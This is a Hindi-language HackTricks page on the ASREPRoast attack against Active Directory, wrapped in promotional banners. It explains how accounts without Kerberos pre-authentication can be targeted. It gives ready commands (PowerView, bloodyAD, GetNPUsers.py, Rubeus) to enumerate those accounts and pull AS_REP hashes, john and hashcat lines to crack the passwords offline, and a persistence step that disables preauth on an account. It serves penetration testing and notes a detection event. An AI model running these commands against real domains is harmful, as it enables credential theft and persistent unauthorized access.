hacktricks/windows-hardening/active-directory-methodology/asreproast.md

11 KiB

ASREPRoast

शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

HackenProof Discord सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!

हैकिंग इनसाइट्स
हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें

रियल-टाइम हैक न्यूज
रियल-टाइम न्यूज और इनसाइट्स के माध्यम से हैकिंग की तेजी से बदलती दुनिया के साथ अपडेट रहें

नवीनतम घोषणाएँ
नवीनतम बग बाउंटीज लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें

Discord पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

ASREPRoast

ASREPRoast हमला उन उपयोगकर्ताओं की खोज करता है जिनके पास Kerberos प्री-प्रमाणीकरण आवश्यक विशेषता नहीं है (DONT_REQ_PREAUTH).

इसका मतलब है कि कोई भी उन उपयोगकर्ताओं में से किसी की ओर से DC को AS_REQ अनुरोध भेज सकता है, और AS_REP संदेश प्राप्त कर सकता है। यह अंतिम प्रकार का संदेश एक डेटा चंक होता है जो मूल उपयोगकर्ता की कुंजी से एन्क्रिप्टेड होता है, जो उसके पासवर्ड से निकाला गया होता है। फिर, इस संदेश का उपयोग करके, उपयोगकर्ता का पासवर्ड ऑफलाइन क्रैक किया जा सकता है।

इसके अलावा, इस हमले को करने के लिए किसी डोमेन खाते की आवश्यकता नहीं होती, केवल DC से कनेक्शन की जरूरत होती है। हालांकि, एक डोमेन खाते के साथ, LDAP क्वेरी का उपयोग करके डोमेन में Kerberos प्री-प्रमाणीकरण के बिना उपयोगकर्ताओं को पुनः प्राप्त किया जा सकता हैअन्यथा उपयोगकर्ता नामों का अनुमान लगाना होगा

संवेदनशील उपयोगकर्ताओं का सूचीकरण (डोमेन क्रेडेंशियल्स की आवश्यकता है)

{% code title="विंडोज का उपयोग करते हुए" %}

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
{% endcode %}

{% code title="लिनक्स का उपयोग करते हुए" %}
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

AS_REP संदेश का अनुरोध

{% code title="लिनक्स का उपयोग करते हुए" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% endcode %}

{% code title="विंडोज का उपयोग करते हुए" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} Rubeus के साथ AS-REP Roasting करने पर एक 4768 इवेंट उत्पन्न होगा जिसका एन्क्रिप्शन प्रकार 0x17 और प्रीऑथ प्रकार 0 होगा। {% endhint %}

क्रैकिंग

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

स्थायित्व

जहां आपके पास GenericAll अनुमतियां हैं (या गुण लिखने की अनुमतियां हैं), वहां उपयोगकर्ता के लिए preauth आवश्यक नहीं होने के लिए बल दें:

{% code title="विंडोज का उपयोग करते हुए" %}

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

{% endcode %}

{% code title="लिनक्स का उपयोग करते हुए" %}

bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH

{% endcode %}

संदर्भ

AS-REP Roasting के बारे में अधिक जानकारी ired.team में

अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करने के लिए HackenProof Discord सर्वर में शामिल हों!

हैकिंग अंतर्दृष्टि
हैकिंग के रोमांच और चुनौतियों पर गहराई से जानकारी प्राप्त करें

रियल-टाइम हैक समाचार
रियल-टाइम समाचार और अंतर्दृष्टि के माध्यम से हैकिंग दुनिया के साथ अद्यतन रहें

नवीनतम घोषणाएँ
नवीनतम बग बाउंटीज के लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें

Discord पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें!

HackTricks का समर्थन करने के अन्य तरीके: